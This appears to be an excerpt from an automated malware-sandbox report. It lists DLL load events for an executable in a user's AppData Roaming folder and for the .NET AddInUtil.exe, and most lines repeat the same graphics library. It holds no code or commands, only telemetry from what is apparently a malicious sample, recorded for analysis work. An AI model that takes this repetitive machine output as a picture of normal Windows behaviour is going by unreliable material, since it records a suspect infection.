Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxx.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: nvapi64.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
